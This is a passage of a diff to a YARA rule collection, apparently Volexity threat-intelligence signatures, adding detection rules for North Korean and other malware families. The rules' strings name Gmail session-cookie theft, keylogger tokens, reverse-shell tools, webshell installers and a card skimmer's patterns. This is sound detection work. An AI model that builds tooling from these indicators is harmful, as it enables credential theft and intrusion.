$unicode1 = "document[\"\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0053\\u0063\\u0072\\u0069\\u0070\\u0074\"]" ascii + $unicode2 = "\\u0061\\u0070\\u0070\\u006c\\u0069\\u0063\\u0061\\u0074\\u0069\\u006f\\u006e\\u002f\\u006a\\u0073\\u006f\\u006e" ascii + $unicode3 = "\\u0063\\u006c\\u0069\\u0065\\u006e\\u0074\\u0057\\u0069\\u0064\\u0074\\u0068" ascii + $unicode4 = "=window[\"\\u0073\\u0063\\u0072\\u0065\\u0065\\u006e\"]" ascii + $header = "(function(){info={};finished=" ascii + + condition: + all of ($rev*) or all of ($unicode*) or $header +} rule VOLEXITY_Apt_Ico_Uta0040_B64_C2 : UTA0040 FILE { meta: @@ -203235,183 +204580,474 @@ rule VOLEXITY_Informational_Win_3Cx_Msi : UTA0040 condition: all of them } -rule VOLEXITY_Apt_Win_Avburner : SNAKECHARMER +rule VOLEXITY_Apt_Win_Bluelight_B : INKYSQUID { meta: - description = "Detects AVBurner based on a combination of API calls used, hard-coded strings and bytecode patterns." + description = "North Korean origin malware which uses a custom Google App for c2 communications." author = "threatintel@volexity.com" - id = "1bde0861-4820-5bb1-98a3-516092c91be0" - date = "2023-01-02" - modified = "2023-03-07" - reference = "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-03-07 AVBurner/yara.yar#L1-L36" + id = "8dc51d15-d0ca-5307-ac00-5b20e4900655" + date = "2021-06-21" + modified = "2021-09-01" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-17 - InkySquid Part 1/indicators/yara.yar#L1-L100" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "a6e83ca2ae15f1a7819f065449f84166da401739d091565605d62ebba3d47a50" + score = 75 + quality = 55 + tags = "INKYSQUID" + hash1 = "837eaf7b736583497afb8bbdb527f70577901eff04cc69d807983b233524bfed" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $magic = "host_name: %ls, cookie_name: %s, cookie: %s, CT: %llu, ET: %llu, value: %s, path: %ls, secu: %d, http: %d, last: %llu, has: %d" + $f1 = "%ls.INTEG.RAW" wide + $f2 = "edb.chk" ascii + $f3 = "edb.log" ascii + $f4 = "edbres00001.jrs" ascii + $f5 = "edbres00002.jrs" ascii + $f6 = "edbtmp.log" ascii + $f7 = "cheV01.dat" ascii + $chrome1 = "Failed to get chrome cookie" + $chrome2 = "mail.google.com, cookie_name: OSID" + $chrome3 = ".google.com, cookie_name: SID," + $chrome4 = ".google.com, cookie_name: __Secure-3PSID," + $chrome5 = "Failed to get Edge cookie" + $chrome6 = "google.com, cookie_name: SID," + $chrome7 = "google.com, cookie_name: __Secure-3PSID," + $chrome8 = "Failed to get New Edge cookie" + $chrome9 = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0" + $chrome10 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8" + $chrome11 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s" + $chrome12 = "https://mail.google.com" + $chrome13 = "result.html" + $chrome14 = "GM_ACTION_TOKEN" + $chrome15 = "GM_ID_KEY=" + $chrome16 = "/mail/u/0/?ik=%s&at=%s&view=up&act=prefs" + $chrome17 = "p_bx_ie=1" + $chrome18 = "myaccount.google.com, cookie_name: OSID" + $chrome19 = "Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3" + $chrome20 = "Content-Type: application/x-www-form-urlencoded;charset=utf-8" + $chrome21 = "Cookie: SID=%s; OSID=%s; __Secure-3PSID=%s" + $chrome22 = "https://myaccount.google.com" + $chrome23 = "result.html" + $chrome24 = "myaccount.google.com" + $chrome25 = "/_/AccountSettingsUi/data/batchexecute" + $chrome26 = "f.req=%5B%5B%5B%22BqLdsd%22%2C%22%5Btrue%5D%22%2Cnull%2C%22generic%22%5D%5D%5D&at=" + $chrome27 = "response.html" + $msg1 = "https_status is %s" + $msg2 = "Success to find GM_ACTION_TOKEN and GM_ID_KEY" + $msg3 = "Failed to find GM_ACTION_TOKEN and GM_ID_KEY" + $msg4 = "Failed HttpSendRequest to mail.google.com" + $msg5 = "Success to enable imap" + $msg6 = "Failed to enable imap" + $msg7 = "Success to find SNlM0e" + $msg8 = "Failed to find SNlM0e" + $msg9 = "Failed HttpSendRequest to myaccount.google.com" + $msg10 = "Success to enable thunder access" + $msg11 = "Failed to enable thunder access" + $keylogger_component1 = "[TAB]" + $keylogger_component2 = "[RETURN]" + $keylogger_component3 = "PAUSE" + $keylogger_component4 = "[ESC]" + $keylogger_component5 = "[PAGE UP]" + $keylogger_component6 = "[PAGE DOWN]" + $keylogger_component7 = "[END]" + $keylogger_component8 = "[HOME]" + $keylogger_component9 = "[ARROW LEFT]" + $keylogger_component10 = "[ARROW UP]" + $keylogger_component11 = "[ARROW RIGHT]" + $keylogger_component12 = "[ARROW DOWN]" + $keylogger_component13 = "[INS]" + $keylogger_component14 = "[DEL]" + $keylogger_component15 = "[WIN]" + $keylogger_component16 = "[NUM *]" + $keylogger_component17 = "[NUM +]" + $keylogger_component18 = "[NUM ,]" + $keylogger_component19 = "[NUM -]" + $keylogger_component20 = "[NUM .]" + $keylogger_component21 = "NUM /]" + $keylogger_component22 = "[NUMLOCK]" + $keylogger_component23 = "[SCROLLLOCK]" + $keylogger_component24 = "Time: " + $keylogger_component25 = "Window: " + $keylogger_component26 = "CAPSLOCK+" + $keylogger_component27 = "SHIFT+" + $keylogger_component28 = "CTRL+" + $keylogger_component29 = "ALT+" + + condition: + $magic or ( all of ($f*) and 5 of ($keylogger_component*)) or 24 of ($chrome*) or 4 of ($msg*) or 27 of ($keylogger_component*) +} +rule VOLEXITY_Apt_Win_Bluelight : INKYSQUID +{ + meta: + description = "The BLUELIGHT malware family. Leverages Microsoft OneDrive for network communications." + author = "threatintel@volexity.com" + id = "3ec2d44c-4c08-514d-a839-acef3f53f7dc" + date = "2021-04-23" + modified = "2021-09-01" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-17 - InkySquid Part 1/indicators/yara.yar#L102-L132" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "52589348f42aadbe453ad8a40ac36b58fcc9e07cd298486f09b6f793823d8cc7" + score = 75 + quality = 80 + tags = "INKYSQUID" + hash1 = "7c40019c1d4cef2ffdd1dd8f388aaba537440b1bffee41789c900122d075a86d" + hash2 = "94b71ee0861cc7cfbbae53ad2e411a76f296fd5684edf6b25ebe79bf6a2a600a" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $pdb1 = "\\Development\\BACKDOOR\\ncov\\" + $pdb2 = "Release\\bluelight.pdb" + $msg0 = "https://ipinfo.io" fullword + $msg1 = "country" fullword + $msg5 = "\"UserName\":\"" fullword + $msg7 = "\"ComName\":\"" fullword + $msg8 = "\"OS\":\"" fullword + $msg9 = "\"OnlineIP\":\"" fullword + $msg10 = "\"LocalIP\":\"" fullword + $msg11 = "\"Time\":\"" fullword + $msg12 = "\"Compiled\":\"" fullword + $msg13 = "\"Process Level\":\"" fullword + $msg14 = "\"AntiVirus\":\"" fullword + $msg15 = "\"VM\":\"" fullword + + condition: + any of ($pdb*) or all of ($msg*) +} +rule VOLEXITY_Apt_Rb_Rokrat_Loader : INKYSQUID +{ + meta: + description = "Ruby loader seen loading the ROKRAT malware family." + author = "threatintel@volexity.com" + id = "69d09560-a769-55d3-a442-e37f10453cde" + date = "2021-06-22" + modified = "2021-09-02" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-24 - InkySquid Part 2/indicators/yara.yar#L1-L25" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "30ae14fd55a3ab60e791064f69377f3b9de9b871adfd055f435df657f89f8007" + score = 75 + quality = 80 + tags = "INKYSQUID" + hash1 = "5bc52f6c1c0d0131cee30b4f192ce738ad70bcb56e84180f464a5125d1a784b2" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $magic1 = "'https://update.microsoft.com/driverupdate?id=" ascii wide + $magic2 = "sVHZv1mCNYDO0AzI';" ascii wide + $magic3 = "firoffset..scupd.size" ascii wide + $magic4 = /alias UrlFilter[0-9]{2,5} eval;"/ + $s1 = "clRnbp9GU6oTZsRGZpZ" + $s2 = "RmlkZGxlOjpQb2ludGVy" + $s3 = "yVGdul2bQpjOlxGZklmR" + $s4 = "XZ05WavBlO6UGbkRWaG" + + condition: + any of ($magic*) or any of ($s*) +} +rule VOLEXITY_Apt_Py_Bluelight_Ldr : INKYSQUID +{ + meta: + description = "Python Loader used to execute the BLUELIGHT malware family." + author = "threatintel@volexity.com" + id = "f8da3e40-c3b0-5b7f-8ece-81874993d8cd" + date = "2021-06-22" + modified = "2021-09-02" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-24 - InkySquid Part 2/indicators/yara.yar#L27-L45" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "e7e18a6d648b1383706439ba923335ac4396f6b5d2a3dc8f30f63ded7df29eda" + score = 75 + quality = 80 + tags = "INKYSQUID" + hash1 = "80269413be6ad51b8b19631b2f5559c9572842e789bbce031babe6e879d2e120" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $s1 = "\"\".join(chr(ord(" ascii + $s2 = "import ctypes " ascii + $s3 = "ctypes.CFUNCTYPE(ctypes.c_int)" ascii + $s4 = "ctypes.memmove" ascii + $s5 = "python ended" ascii + + condition: + all of them +} +rule VOLEXITY_Apt_Win_Decrok : INKYSQUID +{ + meta: + description = "The DECROK malware family, which uses the victim's hostname to decrypt and execute an embedded payload." + author = "threatintel@volexity.com" + id = "dc83843d-fd2a-52f1-82e8-8e36b135a0c5" + date = "2021-06-23" + modified = "2021-09-02" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-24 - InkySquid Part 2/indicators/yara.yar#L47-L67" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + hash = "6a452d088d60113f623b852f33f8f9acf0d4197af29781f889613fed38f57855" + logic_hash = "47fa03e95ac17ba7195858cd63b1769e5d56ab8a5edf872b345989b767050b87" + score = 75 + quality = 80 + tags = "INKYSQUID" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $v1 = {C7 ?? ?? ?? 01 23 45 67 [2-20] C7 ?? ?? ?? 89 AB CD EF C7 ?? ?? ?? FE DC BA 98} + $av1 = "Select * From AntiVirusProduct" wide + $av2 = "root\\SecurityCenter2" wide + $funcformat = { 25 30 32 78 [0-10] 43 72 65 61 74 65 54 68 72 65 61 64 } + + condition: + all of them +} +rule VOLEXITY_Apt_Win_Rokload : INKYSQUID +{ + meta: + description = "A shellcode loader used to decrypt and run an embedded executable." + author = "threatintel@volexity.com" + id = "229dbf3c-1538-5ecd-b5f8-8c9a9c81c515" + date = "2021-06-23" + modified = "2021-09-02" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-08-24 - InkySquid Part 2/indicators/yara.yar#L69-L83" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + hash = "85cd5c3bb028fe6931130ccd5d0b0c535c01ce2bcda660a3b72581a1a5382904" + logic_hash = "8d65d32fd5bc055ca0e3831d3db88299e7c99f8547a170d3c53ec2c4001496a3" + score = 75 + quality = 80 + tags = "INKYSQUID" + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $bytes00 = { 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 48 ?? ?? ?? ?? 57 41 54 41 55 41 56 41 57 48 ?? ?? ?? b9 ?? ?? ?? ?? 33 ff e8 ?? ?? ?? ?? b9 ?? ?? ?? ?? 4c 8b e8 e8 ?? ?? ?? ?? 4c 8b f0 41 ff d6 b9 ?? ?? ?? ?? 44 8b f8 e8 ?? ?? ?? ?? 4c 8b e0 e8 ?? ?? ?? ?? 48 } + + condition: + $bytes00 at 0 +} +import "pe" + +rule VOLEXITY_Trojan_Win_Backwash_Cpp : XEGROUP +{ + meta: + description = "CPP loader for the Backwash malware." + author = "threatintel@volexity.com" + id = "8a1c4ff1-1827-5e6f-b838-664d8c3be840" + date = "2021-11-17" + modified = "2021-12-07" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L3-L20" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "c8ed2d3103aa85363acd7f5573aeb936a5ab5a3bacbcf1f04e6b298299f24dae" + score = 75 + quality = 80 + tags = "XEGROUP" + hash1 = "0cf93de64aa4dba6cec99aa5989fc9c5049bc46ca5f3cb327b49d62f3646a852" + memory_suitable = 1 + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $s1 = "cor1dbg.dll" wide + $s2 = "XEReverseShell.exe" wide + $s3 = "XOJUMAN=" wide + + condition: + 2 of them +} +import "pe" + +rule VOLEXITY_Trojan_Win_Iis_Shellsave : XEGROUP +{ + meta: + description = "Detects an AutoIT backdoor designed to run on IIS servers and to install a webshell. This rule will only work against memory samples." + author = "threatintel@volexity.com" + id = "a89defa5-4b22-5650-a0c0-f4b3cf3377a7" + date = "2021-11-17" + modified = "2021-12-07" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L22-L40" + license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" + logic_hash = "f34d6f4ecaa4cde5965f6b0deac55c7133a2be96f5c466f34775be6e7f730493" + score = 75 + quality = 80 + tags = "XEGROUP" + hash1 = "21683e02e11c166d0cf616ff9a1a4405598db7f4adfc87b205082ae94f83c742" + memory_suitable = 1 + license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" + + strings: + $s1 = "getdownloadshell" ascii + $s2 = "deleteisme" ascii + $s3 = "sitepapplication" ascii + $s4 = "getapplicationpool" ascii + + condition: + all of them +} +import "pe" + +rule VOLEXITY_Trojan_Backwash_Iis_Scout : XEGROUP +{ + meta: + description = "Simple backdoor which collects information about the IIS server it is installed on. It appears to the attacker refers to this components as 'XValidate' - i.e. to validate infected machines." + author = "threatintel@volexity.com" + id = "1f768b39-21a0-574d-9043-5104540003f7" + date = "2021-11-17" + modified = "2021-12-07" + reference = "https://github.com/volexity/threat-intel" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L42-L66" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - hash = "4b1b1a1293ccd2c0fd51075de9376ebb55ab64972da785153fcb0a4eb523a5eb" - logic_hash = "56ff6c8a4b737959a1219699a0457de1f0c34fead4299033840fb23c56a0caad" + logic_hash = "18c4e338905ff299d75534006037e63a8f9b191f062cc97b0592245518015f88" score = 75 quality = 80 - tags = "SNAKECHARMER" + tags = "XEGROUP" + hash1 = "6f44a9c13459533a1f3e0b0e698820611a18113c851f763797090b8be64fd9d5" memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $api1 = "PspCreateProcessNotifyRoutineAddress" wide - $api2 = "PspCreateThreadNotifyRoutineAddress" wide - $api3 = "PspLoadImageNotifyRoutineAddress" wide - $str1 = "\\\\.\\RTCORE64" wide - $str2 = "\\\\%ws/pipe/%ws" wide - $str3 = "CreateServerW Failed %u" wide - $str4 = "OpenSCManager Failed %u" wide - $str5 = "Get patternAddress" wide - $pattern1 = { 4C 8B F9 48 8D 0C C1 E8 } - $pattern2 = { 48 8D 0C DD 00 00 00 00 45 33 C0 49 03 CD 48 8B } - $pattern3 = { 48 8D 04 C1 48 89 45 70 48 8B C8 E8 } - $pattern4 = { 49 8D 0C FC 45 33 C0 48 8B D6 E8 00 00 00 00 00} - $pattern5 = { 45 33 C0 48 8D 0C D9 48 8B D7 E8 00 00 00 00 00 00 00 00 00 00 00 00 00 } - $pattern6 = { 41 0F BA 6D 00 0A BB 01 00 00 00 4C 8B F2 4C 8B F9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 } + $s1 = "SOAPRequest" ascii + $s2 = "requestServer" ascii + $s3 = "getFiles" ascii + $s4 = "APP_POOL_CONFIG" wide + $s5 = "<virtualDirectory" wide + $s6 = "stringinstr" ascii + $s7 = "504f5354" wide + $s8 = "XValidate" ascii + $s9 = "XEReverseShell" ascii + $s10 = "XERsvData" ascii condition: - all of ($api*) or all of ($str*) or all of ($pattern*) + 6 of them } -rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Common_Certificate : EVILBAMBOO FILE +import "pe" + +rule VOLEXITY_Web_Js_Xeskimmer : XEGROUP { meta: - description = "Detection of the common.cer file used for a large BADBAZAAR malware cluster for its certificate pinning for the C2 communication." + description = "Detects JScript code using in skimming credit card details." author = "threatintel@volexity.com" - id = "5a033770-7ad3-5c79-90ac-b1e3fff6b5f0" - date = "2023-06-01" - modified = "2023-06-13" - reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L230-L255" + id = "2c0911cf-a679-5d4e-baad-777745a28e27" + date = "2021-11-17" + modified = "2021-12-07" + reference = "https://github.com/MBThreatIntel/skimmers/blob/master/null_gif_skimmer.js" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L68-L97" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "861d4e1c40847c6ade04eddb047370d645afea6d5c16d55155fa58a16111c39e" + logic_hash = "cc46e9fab5f408fde13c3897d378a1a2e4acb448f40ca4935c19024ebdc252d7" score = 75 quality = 80 - tags = "EVILBAMBOO, FILE" - hash1 = "6aefc2b33e23f6e3c96de51d07f7123bd23ff951d67849a9bd32d446e76fb405" - scan_context = "file" + tags = "XEGROUP" + hash1 = "92f9593cfa0a28951cae36755d54de63631377f1b954a4cb0474fa0b6193c537" + memory_suitable = 0 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $b1 = {30 82 03 61 30 82 02 49 a0 03 02 01 02 02 04 2b 6e df 67 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b} - $s1 = "california1" - $s2 = "los1" - $s3 = "tech1" - $s4 = "common1" - $s5 = "common0" - $s6 = "220401234506Z" - $s7 = "470326234506Z0a1" + $s1 = ".match(/^([3456]\\d{14,15})$/g" ascii + $s2 = "^(p(wd|ass(code|wd|word)))" ascii + $b1 = "c('686569676874')" ascii + $b2 = "c('7769647468')" ascii + $c1 = "('696D67')" ascii + $c2 = "('737263')" ascii + $magic = "d=c.charCodeAt(b),a+=d.toString(16);" condition: - $b1 at 0 or all of ($s*) + all of ($s*) or all of ($b*) or all of ($c*) or $magic } -rule VOLEXITY_Apt_Malware_Apk_Badbazaar_Stage2_Implant_May23 : EVILBAMBOO FILE +import "pe" + +rule VOLEXITY_Trojan_Win_Xe_Backwash : XEGROUP FILE { meta: - description = "Detection of the second stage capability of the BadBazaar android malware that has the main malicious capabilities. Will gather various info about the user/phone and routinely send this to the C2." + description = "The BACKWASH malware family, which acts as a reverse shell on the victim machine." author = "threatintel@volexity.com" - id = "1f97c610-773f-5385-935a-445cb9192157" - date = "2023-05-25" - modified = "2023-08-30" + id = "93bbbf58-8ba2-565f-98f5-51d6f1a1ab06" + date = "2020-09-04" + modified = "2021-12-07" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L257-L285" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L99-L129" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "2186369298ebfa0b892ecb14ebacc93c6d14c9c35012e8e6cdff077634cf3773" + hash = "815d262d38a26d5695606d03d5a1a49b9c00915ead1d8a2c04eb47846100e93f" + logic_hash = "cabe7d17017c95943b7ae9d1827b3a5cb8ed3b02506222367498a73fec8d0914" score = 75 quality = 80 - tags = "EVILBAMBOO, FILE" - hash1 = "bf5f7fbf42236e89bcf663d2822d54bee89abaf3f247a54f371bf156e0e03629" - scan_context = "file" + tags = "XEGROUP, FILE" + memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $c1 = "%{\"command\":\"%s\",\"path\":\"%s\",\"files\":[" - $c2 = "{\"name\":\"%s\",\"dirs\":\"%d\",\"files\":\"%d\",\"isfolder\":\"%d\",\"path\":\"%s\"}," - $s1 = "Timezon id:" - $s2 = "China Telecom" - $s3 = "China Unicom" - $s4 = "ConfigPipe" - $s5 = "ForwordTo" - $s6 = "can't get camera content" - $s7 = "cat /sys/class/net/wlan0/address" - $s8 = "_preferences_light" - $s9 = "registration_jid" + $pdb1 = "x:\\MultiOS_ReverseShell-master\\Multi-OS_ReverseShell\\obj\\Release\\XEReverseShell.pdb" + $pdb2 = "\\Release\\XEReverseShell.pdb" + $a1 = "RunServer" ascii + $a2 = "writeShell" ascii + $a3 = "GetIP" ascii + $b1 = "xequit" wide + $b2 = "setshell" wide condition: - 1 of ($c*) or 5 of ($s*) + any of ($pdb*) or (( all of ($a*) or all of ($b*)) and filesize <40KB) } -rule VOLEXITY_Apt_Delivery_Web_Js_Jmask_Str_Array_Variant : EVILBAMBOO FILE +import "pe" + +rule VOLEXITY_Trojan_Win_Pngexe : XEGROUP FILE { meta: - description = "Detects the JMASK profiling script in an obfuscated format using a string array and an offset." + description = "Detects PNGEXE, a simple reverse shell loader." author = "threatintel@volexity.com" - id = "d5d32c8b-53fb-5103-ac73-05f320e71c97" - date = "2023-06-27" - modified = "2023-09-21" + id = "a0168176-6b2d-56ba-baaa-f011d9f5e3ad" + date = "2020-09-04" + modified = "2021-12-07" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L408-L444" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L132-L159" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "0ae7c96e0f866f21d66d7a23bf937d6ce48c9dd1ea19142dbb13487208780146" + hash = "72f7d4d3b9d2e406fa781176bd93e8deee0fb1598b67587e1928455b66b73911" + logic_hash = "05ab554eaf208ff0f5fde37b835c92e55bf0de21bd2700fdd31d81ba338cbdc7" score = 75 quality = 80 - tags = "EVILBAMBOO, FILE" - hash1 = "7995c382263f8dbbfc37a9d62392aef8b4f89357d436b3dd94dea842f9574ecf" - scan_context = "file" + tags = "XEGROUP, FILE" + hash2 = "4d913ecb91bf32fd828d2153342f5462ae6b84c1a5f256107efc88747f7ba16c" + memory_suitable = 0 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $array_1 = "http://eular.github.io" - $array_2 = "stun:stun.services.mozilla.com" - $array_3 = "\xE6\x9C\xAA\xE5\xAE\x89\xE8\xA3\x85MetaMask" - $array_4 = "/jquery/jquery.min.js" - $array_5 = "onicecandidate" - $ios_1 = "['a7', '640x1136', [_0x" - $ios_2 = "['a7', _0x" - $ios_3 = "['a8', _0x" - $ios_4 = "['a8', '750x1334', ['iPhone\\x206']]" - $ios_5 = "['a8', '1242x2208', ['iPhone\\x206\\x20Plus']]" - $ios_6 = "['a8', _0x" - $ios_7 = "['a9', _0x" - $ios_8 = "['a9', '750x1334', [_0x" - $ios_9 = "['a9', '1242x2208', ['iPhone\\x206s\\x20Plus']]" - $ios_10 = "['a9x', '2048x2732', ['iPad\\x20Pro\\x20(1st\\x20gen\\x2012.9-inch)']]" - $ios_11 = "['a10x', '1668x2224', [_0x" - $header = "info = {}, finished = 0x0;" + $a1 = "amd64.png" ascii + $a2 = "x86.png" ascii condition: - 3 of ($array_*) or 5 of ($ios_*) or $header + uint16(0)==0x5A4D and (( any of ($a*) and filesize >30KB and filesize <200KB) or pe.imphash()=="ca41f83b03cf3bb51082dbd72e3ba1ba" or pe.imphash()=="e93abc400902e72707edef1f717805f0" or pe.imphash()=="83a5d4aa20a8aca2a9aa6fc2a0aa30b0") } -rule VOLEXITY_Apt_Delivery_Web_Js_Jmask : EVILBAMBOO FILE +import "pe" + +rule VOLEXITY_Trojan_Win_Backwash_Iis : XEGROUP { meta: - description = "Detects the JMASK profiling script in its minified // obfuscated format." + description = "Variant of the BACKWASH malware family with IIS worm functionality." author = "threatintel@volexity.com" - id = "a7b653e1-f7c6-56cc-ab99-3de91d29ef3b" - date = "2023-06-15" - modified = "2023-09-21" + id = "08a86a58-32af-5c82-90d2-d6603dae8d63" + date = "2020-09-04" + modified = "2021-12-07" reference = "https://github.com/volexity/threat-intel" - source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2023/2023-09-22 EvilBamboo/indicators/rules.yar#L446-L472" + source_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/2021/2021-12-06 - XEGroup/indicators/yara.yar#L161-L184" license_url = "https://github.com/volexity/threat-intel/blob/f5ecc7bce2475e6bd1038a807bca3e313640fdf3/LICENSE.txt" - logic_hash = "64315ac05049954d36297a616a25ffdd7ce81c6313c0878d5ba4082da24c21bb" + hash = "98e39573a3d355d7fdf3439d9418fdbf4e42c2e03051b5313d5c84f3df485627" + logic_hash = "95a7f9e0afb031b49cd0da66b5a887d26ad2e06cce625bc45739b4a80e96ce9c" score = 75 quality = 80 - tags = "EVILBAMBOO, FILE" - hash1 = "efea95720853e0cd2d9d4e93a64a726cfe17efea7b17af7c4ae6d3a6acae5b30" - scan_context = "file" + tags = "XEGROUP" + memory_suitable = 1 license = "See license at https://github.com/volexity/threat-intel/blob/main/LICENSE.txt" strings: - $rev0 = "oi.buhtig.ralue//:ptth" ascii - $rev1 = "lairA' xp41" ascii - $rev2 = "dnuof ton ksaMateM" ascii - $unicode1 = "document[\"\\u0063\\u0075\\u0072\\u0072\\u0065\\u006e\\u0074\\u0053\\u0063\\u0072\\u0069\\u0070\\u0074\"]" ascii - $unicode2 = "\\u0061\\u0070\\u0070\\u006c\\u0069\\u0063\\u0061\\u0074\\u0069\\u006f\\u006e\\u002f\\u006a\\u0073\\u006f\\u006e" ascii - $unicode3 = "\\u0063\\u006c\\u0069\\u0065\\u006e\\u0074\\u0057\\u0069\\u0064\\u0074\\u0068" ascii - $unicode4 = "=window[\"\\u0073\\u0063\\u0072\\u0065\\u0065\\u006e\"]" ascii - $header = "(function(){info={};finished=" ascii + $a1 = "GetShell" ascii + $a2 = "smallShell" ascii + $a3 = "createSmallShell" ascii + $a4 = "getSites" ascii + $a5 = "getFiles " ascii + $b1 = "action=saveshell&domain=" ascii wide + $b2 = "&shell=backsession.aspx" ascii wide condition: - all of ($rev*) or all of ($unicode*) or $header + all of ($a*) or any of ($b*) } rule VOLEXITY_Webshell_Aspx_Simpleseesharp : WEBSHELL UNCLASSIFIED FILE { @@ -203589,480 +205225,712 @@ rule VOLEXITY_Apt_Win_Freshfire : APT29 condition: (pe.number_of_exports==1 and pe.exports("WaitPrompt")) or any of ($uniq*) or 2 of ($path*) } -rule VOLEXITY_Apt_Rb_Rokrat_Loader : INKYSQUID +rule VOLEXITY_Apt_Win_Applejeus_Oct22 : LAZARUS { meta: - description = "Ruby loader seen loading the ROKRAT malware family." + description = "Detects AppleJeus DLL samples." author = "threatintel@volexity.com" - id = "69d09560-a769-55d3-a442-e37f10453cde" - date = "2021-06-22" - modified = 